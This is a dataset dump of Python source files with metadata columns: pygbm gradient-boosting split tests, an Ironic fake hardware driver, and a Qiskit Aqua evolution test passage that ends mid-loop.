max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
|---|---|---|---|---|---|---|---|---|---|---|
tests/unit/plain/test_splitting.py
|
Goorman/pygbm
| 0
|
6627551
|
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.testing import assert_array_almost_equal
import pytest
from pygbm.plain.splitting import _find_histogram_split
from pygbm.plain.splitting import (SplittingContext, find_node_split,
find_node_split_subtraction,
split_indices)
@pytest.mark.parametrize('n_bins', [3, 32, 256])
def test_histogram_split(n_bins):
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(int(1e4), 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(binned_feature.shape[0], dtype=np.uint32)
ordered_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_hessians = ordered_hessians
for true_bin in range(1, n_bins - 1):
for sign in [-1, 1]:
ordered_gradients = np.full_like(binned_feature, sign,
dtype=np.float32)
ordered_gradients[binned_feature <= true_bin] *= -1
all_gradients = ordered_gradients
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned,
n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx,
sample_indices)
assert split_info.bin_idx == true_bin
assert split_info.gain >= 0
assert split_info.feature_idx == feature_idx
assert (split_info.n_samples_left + split_info.n_samples_right
== sample_indices.shape[0])
# Constant hessian: 1. per sample.
assert split_info.n_samples_left == split_info.hessian_left
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_split_vs_split_subtraction(constant_hessian):
# Make sure find_node_split and find_node_split_subtraction return the
# same results.
# Should we add a test about computation time to make sure
# time(subtraction) < time(regular)?
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure histograms from classical and subtraction method are the same
for hists, hists_sub in ((hists_left, hists_left_sub),
(hists_right, hists_right_sub)):
for hist, hist_sub in zip(hists, hists_sub):
for key in ('count', 'sum_hessians', 'sum_gradients'):
assert_array_almost_equal(hist[key], hist_sub[key], decimal=4)
# make sure split_infos from classical and subtraction method are the same
for si, si_sub in ((si_left, si_left_sub), (si_right, si_right_sub)):
assert_almost_equal(si.gain, si_sub.gain, decimal=3)
assert_almost_equal(si.feature_idx, si_sub.feature_idx, decimal=3)
assert_almost_equal(si.gradient_left, si_sub.gradient_left, decimal=3)
assert_almost_equal(si.gradient_right, si_sub.gradient_right,
decimal=3)
assert_almost_equal(si.hessian_right, si_sub.hessian_right, decimal=3)
assert_almost_equal(si.hessian_left, si_sub.hessian_left, decimal=3)
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_gradient_and_hessian_sanity(constant_hessian):
# This test checks that the values of gradients and hessians are
# consistent in different places:
# - in split_info: si.gradient_left + si.gradient_right must be equal to
# the gradient at the node. Same for hessians.
# - in the histograms: summing 'sum_gradients' over the bins must be
# constant across all features, and those sums must be equal to the
# node's gradient. Same for hessians.
#
# These checks are carried out for split_info and histograms resulting
# from both find_node_split() and find_node_split_subtraction().
#
# The structure of this test is exactly the same as in
# test_split_vs_split_subtraction() but it's probably best to keep them
# separate because they're not checking the same things.
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure that si.gradient_left + si.gradient_right have their expected
# value, same for hessians
for si, indices in (
(si_parent, sample_indices),
(si_left, sample_indices_left),
(si_left_sub, sample_indices_left),
(si_right, sample_indices_right),
(si_right_sub, sample_indices_right)):
gradient = si.gradient_right + si.gradient_left
expected_gradient = all_gradients[indices].sum()
hessian = si.hessian_right + si.hessian_left
if constant_hessian:
expected_hessian = indices.shape[0] * all_hessians[0]
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradient, expected_gradient, decimal=3)
assert_almost_equal(hessian, expected_hessian, decimal=3)
# make sure sum of gradients in histograms are the same for all features,
# and make sure they're equal to their expected value
for hists, indices in (
(hists_parent, sample_indices),
(hists_left, sample_indices_left),
(hists_left_sub, sample_indices_left),
(hists_right, sample_indices_right),
(hists_right_sub, sample_indices_right)):
# note: gradients and hessians have shape (n_features,),
# we're comparing them to *scalars*. This has the benefit of also
# making sure that all the entries are equal.
gradients = hists['sum_gradients'].sum(axis=1) # shape = (n_features,)
expected_gradient = all_gradients[indices].sum() # scalar
hessians = hists['sum_hessians'].sum(axis=1)
if constant_hessian:
# 0 is not the actual hessian, but it's not computed in this case
expected_hessian = 0.
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradients, expected_gradient, decimal=4)
assert_almost_equal(hessians, expected_hessian, decimal=4)
def test_split_indices():
# Check that split_indices returns the correct splits and that
# splitting_context.partition is consistent with what is returned.
rng = np.random.RandomState(421)
n_bins = 5
n_samples = 10
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
# split will happen on feature 1 and on bin 3
X_binned = [[0, 0],
[0, 3],
[0, 4],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 4],
[0, 0],
[0, 4]]
X_binned = np.asfortranarray(X_binned, dtype=np.uint8)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
all_hessians = np.ones(1, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
assert_array_almost_equal(sample_indices, context.partition)
si_root, _ = find_node_split(context, sample_indices)
# sanity checks for best split
assert si_root.feature_idx == 1
assert si_root.bin_idx == 3
samples_left, samples_right = split_indices(
context, si_root, context.partition.view())
assert set(samples_left) == set([0, 1, 3, 4, 5, 6, 8])
assert set(samples_right) == set([2, 7, 9])
position_right = len(samples_left)
assert_array_almost_equal(samples_left,
context.partition[:position_right])
assert_array_almost_equal(samples_right,
context.partition[position_right:])
# Check that the resulting split indices sizes are consistent with the
# count statistics anticipated when looking for the best split.
assert samples_left.shape[0] == si_root.n_samples_left
assert samples_right.shape[0] == si_root.n_samples_right
def test_min_gain_to_split():
# Try to split a pure node (all gradients are equal, same for hessians)
# with min_gain_to_split = 0 and make sure that the node is not split (best
# possible gain = -1). Note: before the strict inequality comparison, this
# test would fail because the node would be split with a gain of 0.
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 0
min_samples_leaf = 1
min_gain_to_split = 0.
n_bins = 255
n_samples = 100
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(n_samples, 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_gradients = np.ones_like(binned_feature, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins, n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx, sample_indices)
assert split_info.gain == -1
|
import numpy as np
from numpy.testing import assert_almost_equal
from numpy.testing import assert_array_almost_equal
import pytest
from pygbm.plain.splitting import _find_histogram_split
from pygbm.plain.splitting import (SplittingContext, find_node_split,
find_node_split_subtraction,
split_indices)
@pytest.mark.parametrize('n_bins', [3, 32, 256])
def test_histogram_split(n_bins):
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(int(1e4), 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(binned_feature.shape[0], dtype=np.uint32)
ordered_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_hessians = ordered_hessians
for true_bin in range(1, n_bins - 1):
for sign in [-1, 1]:
ordered_gradients = np.full_like(binned_feature, sign,
dtype=np.float32)
ordered_gradients[binned_feature <= true_bin] *= -1
all_gradients = ordered_gradients
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned,
n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx,
sample_indices)
assert split_info.bin_idx == true_bin
assert split_info.gain >= 0
assert split_info.feature_idx == feature_idx
assert (split_info.n_samples_left + split_info.n_samples_right
== sample_indices.shape[0])
# Constant hessian: 1. per sample.
assert split_info.n_samples_left == split_info.hessian_left
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_split_vs_split_subtraction(constant_hessian):
# Make sure find_node_split and find_node_split_subtraction return the
# same results.
# Should we add a test about computation time to make sure
# time(subtraction) < time(regular)?
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure histograms from classical and subtraction method are the same
for hists, hists_sub in ((hists_left, hists_left_sub),
(hists_right, hists_right_sub)):
for hist, hist_sub in zip(hists, hists_sub):
for key in ('count', 'sum_hessians', 'sum_gradients'):
assert_array_almost_equal(hist[key], hist_sub[key], decimal=4)
# make sure split_infos from classical and subtraction method are the same
for si, si_sub in ((si_left, si_left_sub), (si_right, si_right_sub)):
assert_almost_equal(si.gain, si_sub.gain, decimal=3)
assert_almost_equal(si.feature_idx, si_sub.feature_idx, decimal=3)
assert_almost_equal(si.gradient_left, si_sub.gradient_left, decimal=3)
assert_almost_equal(si.gradient_right, si_sub.gradient_right,
decimal=3)
assert_almost_equal(si.hessian_right, si_sub.hessian_right, decimal=3)
assert_almost_equal(si.hessian_left, si_sub.hessian_left, decimal=3)
@pytest.mark.parametrize('constant_hessian', [True, False])
def test_gradient_and_hessian_sanity(constant_hessian):
# This test checks that the values of gradients and hessians are
# consistent in different places:
# - in split_info: si.gradient_left + si.gradient_right must be equal to
# the gradient at the node. Same for hessians.
# - in the histograms: summing 'sum_gradients' over the bins must be
# constant across all features, and those sums must be equal to the
# node's gradient. Same for hessians.
#
# These checks are carried out for split_info and histograms resulting
# from both find_node_split() and find_node_split_subtraction().
#
# The structure of this test is exactly the same as in
# test_split_vs_split_subtraction() but it's probably best to keep them
# separate because they're not checking the same things.
rng = np.random.RandomState(42)
n_bins = 10
n_features = 20
n_samples = 500
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
X_binned = rng.randint(0, n_bins, size=(n_samples, n_features),
dtype=np.uint8)
X_binned = np.asfortranarray(X_binned)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
if constant_hessian:
all_hessians = np.ones(1, dtype=np.float32)
else:
all_hessians = rng.lognormal(size=n_samples).astype(np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
sample_indices_right = sample_indices[~mask]
# first split parent, left and right with classical method
si_parent, hists_parent = find_node_split(context, sample_indices)
si_left, hists_left = find_node_split(context, sample_indices_left)
si_right, hists_right = find_node_split(context, sample_indices_right)
# split left with subtraction method
si_left_sub, hists_left_sub = find_node_split_subtraction(
context, sample_indices_left, hists_parent, hists_right)
# split right with subtraction method
si_right_sub, hists_right_sub = find_node_split_subtraction(
context, sample_indices_right, hists_parent, hists_left)
# make sure that si.gradient_left + si.gradient_right have their expected
# value, same for hessians
for si, indices in (
(si_parent, sample_indices),
(si_left, sample_indices_left),
(si_left_sub, sample_indices_left),
(si_right, sample_indices_right),
(si_right_sub, sample_indices_right)):
gradient = si.gradient_right + si.gradient_left
expected_gradient = all_gradients[indices].sum()
hessian = si.hessian_right + si.hessian_left
if constant_hessian:
expected_hessian = indices.shape[0] * all_hessians[0]
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradient, expected_gradient, decimal=3)
assert_almost_equal(hessian, expected_hessian, decimal=3)
# make sure sum of gradients in histograms are the same for all features,
# and make sure they're equal to their expected value
for hists, indices in (
(hists_parent, sample_indices),
(hists_left, sample_indices_left),
(hists_left_sub, sample_indices_left),
(hists_right, sample_indices_right),
(hists_right_sub, sample_indices_right)):
# note: gradients and hessians have shape (n_features,),
# we're comparing them to *scalars*. This has the benefit of also
# making sure that all the entries are equal.
gradients = hists['sum_gradients'].sum(axis=1) # shape = (n_features,)
expected_gradient = all_gradients[indices].sum() # scalar
hessians = hists['sum_hessians'].sum(axis=1)
if constant_hessian:
# 0 is not the actual hessian, but it's not computed in this case
expected_hessian = 0.
else:
expected_hessian = all_hessians[indices].sum()
assert_almost_equal(gradients, expected_gradient, decimal=4)
assert_almost_equal(hessians, expected_hessian, decimal=4)
def test_split_indices():
# Check that split_indices returns the correct splits and that
# splitting_context.partition is consistent with what is returned.
rng = np.random.RandomState(421)
n_bins = 5
n_samples = 10
l2_regularization = 0.
min_hessian_to_split = 1e-3
min_samples_leaf = 1
min_gain_to_split = 0.
# split will happen on feature 1 and on bin 3
X_binned = [[0, 0],
[0, 3],
[0, 4],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 4],
[0, 0],
[0, 4]]
X_binned = np.asfortranarray(X_binned, dtype=np.uint8)
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_gradients = rng.randn(n_samples).astype(np.float32)
all_hessians = np.ones(1, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins,
n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization, min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
assert_array_almost_equal(sample_indices, context.partition)
si_root, _ = find_node_split(context, sample_indices)
# sanity checks for best split
assert si_root.feature_idx == 1
assert si_root.bin_idx == 3
samples_left, samples_right = split_indices(
context, si_root, context.partition.view())
assert set(samples_left) == set([0, 1, 3, 4, 5, 6, 8])
assert set(samples_right) == set([2, 7, 9])
position_right = len(samples_left)
assert_array_almost_equal(samples_left,
context.partition[:position_right])
assert_array_almost_equal(samples_right,
context.partition[position_right:])
# Check that the resulting split indices sizes are consistent with the
# count statistics anticipated when looking for the best split.
assert samples_left.shape[0] == si_root.n_samples_left
assert samples_right.shape[0] == si_root.n_samples_right
def test_min_gain_to_split():
# Try to split a pure node (all gradients are equal, same for hessians)
# with min_gain_to_split = 0 and make sure that the node is not split (best
# possible gain = -1). Note: before the strict inequality comparison, this
# test would fail because the node would be split with a gain of 0.
rng = np.random.RandomState(42)
feature_idx = 0
l2_regularization = 0
min_hessian_to_split = 0
min_samples_leaf = 1
min_gain_to_split = 0.
n_bins = 255
n_samples = 100
X_binned = np.asfortranarray(
rng.randint(0, n_bins, size=(n_samples, 2)), dtype=np.uint8)
binned_feature = X_binned.T[feature_idx]
sample_indices = np.arange(n_samples, dtype=np.uint32)
all_hessians = np.ones_like(binned_feature, dtype=np.float32)
all_gradients = np.ones_like(binned_feature, dtype=np.float32)
n_bins_per_feature = np.array([n_bins] * X_binned.shape[1],
dtype=np.uint32)
context = SplittingContext(X_binned, n_bins, n_bins_per_feature,
all_gradients, all_hessians,
l2_regularization,
min_hessian_to_split,
min_samples_leaf, min_gain_to_split)
split_info, _ = _find_histogram_split(context, feature_idx, sample_indices)
assert split_info.gain == -1
|
en
| 0.901369
|
# Constant hessian: 1. per sample. # Make sure find_node_split and find_node_split_subtraction return the # same results. # Should we add a test about computation time to make sure # time(subtraction) < time(regular)? # first split parent, left and right with classical method # split left with subtraction method # split right with subtraction method # make sure histograms from classical and subtraction method are the same # make sure split_infos from classical and subtraction method are the same # This test checks that the values of gradients and hessians are # consistent in different places: # - in split_info: si.gradient_left + si.gradient_right must be equal to # the gradient at the node. Same for hessians. # - in the histograms: summing 'sum_gradients' over the bins must be # constant across all features, and those sums must be equal to the # node's gradient. Same for hessians. # # These checks are carried out for split_info and histograms resulting # from both find_node_split() and find_node_split_subtraction(). # # The structure of this test is exactly the same as in # test_split_vs_split_subtraction() but it's probably best to keep them # separate because they're not checking the same things. # first split parent, left and right with classical method # split left with subtraction method # split right with subtraction method # make sure that si.gradient_left + si.gradient_right have their expected # value, same for hessians # make sure sum of gradients in histograms are the same for all features, # and make sure they're equal to their expected value # note: gradients and hessians have shape (n_features,), # we're comparing them to *scalars*. This has the benefit of also # making sure that all the entries are equal. # shape = (n_features,) # scalar # 0 is not the actual hessian, but it's not computed in this case # Check that split_indices returns the correct splits and that # splitting_context.partition is consistent with what is returned. # split will happen on feature 1 and on bin 3 # sanity checks for best split # Check that the resulting split indices sizes are consistent with the # count statistics anticipated when looking for the best split. # Try to split a pure node (all gradients are equal, same for hessians) # with min_gain_to_split = 0 and make sure that the node is not split (best # possible gain = -1). Note: before the strict inequality comparison, this # test would fail because the node would be split with a gain of 0.
| 2.287123
| 2
|
ironic/drivers/fake_hardware.py
|
dangervon/ironic
| 0
|
6627552
|
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fake hardware type.
"""
from ironic.drivers import generic
from ironic.drivers.modules import fake
class FakeHardware(generic.GenericHardware):
"""Fake hardware type.
This hardware type is special-cased in the driver factory to bypass
compatibility verification. Thus, supported_* methods here are only
for calculating the defaults, not for actual check.
All fake implementations are still expected to be enabled in the
configuration.
"""
@property
def supported_bios_interfaces(self):
"""List of classes of supported bios interfaces."""
return [fake.FakeBIOS] + super().supported_bios_interfaces
@property
def supported_boot_interfaces(self):
"""List of classes of supported boot interfaces."""
return [fake.FakeBoot] + super().supported_boot_interfaces
@property
def supported_console_interfaces(self):
"""List of classes of supported console interfaces."""
return [fake.FakeConsole] + super().supported_console_interfaces
@property
def supported_deploy_interfaces(self):
"""List of classes of supported deploy interfaces."""
return [fake.FakeDeploy] + super().supported_deploy_interfaces
@property
def supported_inspect_interfaces(self):
"""List of classes of supported inspect interfaces."""
return [fake.FakeInspect] + super().supported_inspect_interfaces
@property
def supported_management_interfaces(self):
"""List of classes of supported management interfaces."""
return [fake.FakeManagement]
@property
def supported_power_interfaces(self):
"""List of classes of supported power interfaces."""
return [fake.FakePower]
@property
def supported_raid_interfaces(self):
"""List of classes of supported raid interfaces."""
return [fake.FakeRAID] + super().supported_raid_interfaces
@property
def supported_rescue_interfaces(self):
"""List of classes of supported rescue interfaces."""
return [fake.FakeRescue] + super().supported_rescue_interfaces
@property
def supported_storage_interfaces(self):
"""List of classes of supported storage interfaces."""
return [fake.FakeStorage] + super().supported_storage_interfaces
@property
def supported_vendor_interfaces(self):
"""List of classes of supported rescue interfaces."""
return [
fake.FakeVendorB, fake.FakeVendorA
] + super().supported_vendor_interfaces
|
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fake hardware type.
"""
from ironic.drivers import generic
from ironic.drivers.modules import fake
class FakeHardware(generic.GenericHardware):
"""Fake hardware type.
This hardware type is special-cased in the driver factory to bypass
compatibility verification. Thus, supported_* methods here are only
for calculating the defaults, not for actual check.
All fake implementations are still expected to be enabled in the
configuration.
"""
@property
def supported_bios_interfaces(self):
"""List of classes of supported bios interfaces."""
return [fake.FakeBIOS] + super().supported_bios_interfaces
@property
def supported_boot_interfaces(self):
"""List of classes of supported boot interfaces."""
return [fake.FakeBoot] + super().supported_boot_interfaces
@property
def supported_console_interfaces(self):
"""List of classes of supported console interfaces."""
return [fake.FakeConsole] + super().supported_console_interfaces
@property
def supported_deploy_interfaces(self):
"""List of classes of supported deploy interfaces."""
return [fake.FakeDeploy] + super().supported_deploy_interfaces
@property
def supported_inspect_interfaces(self):
"""List of classes of supported inspect interfaces."""
return [fake.FakeInspect] + super().supported_inspect_interfaces
@property
def supported_management_interfaces(self):
"""List of classes of supported management interfaces."""
return [fake.FakeManagement]
@property
def supported_power_interfaces(self):
"""List of classes of supported power interfaces."""
return [fake.FakePower]
@property
def supported_raid_interfaces(self):
"""List of classes of supported raid interfaces."""
return [fake.FakeRAID] + super().supported_raid_interfaces
@property
def supported_rescue_interfaces(self):
"""List of classes of supported rescue interfaces."""
return [fake.FakeRescue] + super().supported_rescue_interfaces
@property
def supported_storage_interfaces(self):
"""List of classes of supported storage interfaces."""
return [fake.FakeStorage] + super().supported_storage_interfaces
@property
def supported_vendor_interfaces(self):
"""List of classes of supported rescue interfaces."""
return [
fake.FakeVendorB, fake.FakeVendorA
] + super().supported_vendor_interfaces
|
en
| 0.8504
|
# Copyright 2016 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. Fake hardware type. Fake hardware type. This hardware type is special-cased in the driver factory to bypass compatibility verification. Thus, supported_* methods here are only for calculating the defaults, not for actual check. All fake implementations are still expected to be enabled in the configuration. List of classes of supported bios interfaces. List of classes of supported boot interfaces. List of classes of supported console interfaces. List of classes of supported deploy interfaces. List of classes of supported inspect interfaces. List of classes of supported management interfaces. List of classes of supported power interfaces. List of classes of supported raid interfaces. List of classes of supported rescue interfaces. List of classes of supported storage interfaces. List of classes of supported rescue interfaces.
| 1.742792
| 2
|
test/aqua/operators/test_evolution.py
|
Milos9304/qiskit-aqua
| 2
|
6627553
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Evolution """
import unittest
from test.aqua import QiskitAquaTestCase
import numpy as np
import scipy.linalg
import qiskit
from qiskit.circuit import ParameterVector, Parameter
from qiskit.aqua.operators import (X, Y, Z, I, CX, H, ListOp, CircuitOp, Zero, EvolutionFactory,
EvolvedOp, PauliTrotterEvolution, QDrift)
# pylint: disable=invalid-name
class TestEvolution(QiskitAquaTestCase):
"""Evolution tests."""
def test_exp_i(self):
""" exponential of Pauli test """
op = Z.exp_i()
gate = op.to_circuit().data[0][0]
self.assertIsInstance(gate, qiskit.circuit.library.RZGate)
self.assertEqual(gate.params[0], 2)
def test_trotter_with_identity(self):
""" trotterization of operator with identity term """
op = (2.0 * I ^ I) + (Z ^ Y)
exact_matrix = scipy.linalg.expm(-1j * op.to_matrix())
evo = PauliTrotterEvolution(trotter_mode='suzuki', reps=2)
with self.subTest('all PauliOp terms'):
circ_op = evo.convert(EvolvedOp(op))
circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
with self.subTest('MatrixOp identity term'):
op = (2.0 * I ^ I).to_matrix_op() + (Z ^ Y)
circ_op = evo.convert(EvolvedOp(op))
circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
with self.subTest('CircuitOp identity term'):
op = (2.0 * I ^ I).to_circuit_op() + (Z ^ Y)
circ_op = evo.convert(EvolvedOp(op))
circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
def test_pauli_evolution(self):
""" pauli evolution test """
op = (-1.052373245772859 * I ^ I) + \
(0.39793742484318045 * I ^ Z) + \
(0.18093119978423156 * X ^ X) + \
(-0.39793742484318045 * Z ^ I) + \
(-0.01128010425623538 * Z ^ Z)
evolution = EvolutionFactory.build(operator=op)
# wf = (Pl^Pl) + (Ze^Ze)
wf = ((np.pi / 2) * op).exp_i() @ CX @ (H ^ I) @ Zero
mean = evolution.convert(wf)
self.assertIsNotNone(mean)
def test_parameterized_evolution(self):
""" parameterized evolution test """
thetas = ParameterVector('θ', length=7)
op = (thetas[0] * I ^ I) + \
(thetas[1] * I ^ Z) + \
(thetas[2] * X ^ X) + \
(thetas[3] * Z ^ I) + \
(thetas[4] * Y ^ Z) + \
(thetas[5] * Z ^ Z)
op = op * thetas[6]
evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
# wf = (Pl^Pl) + (Ze^Ze)
wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
mean = evolution.convert(wf)
circuit_params = mean.to_circuit().parameters
# Check that the non-identity parameters are in the circuit
for p in thetas[1:]:
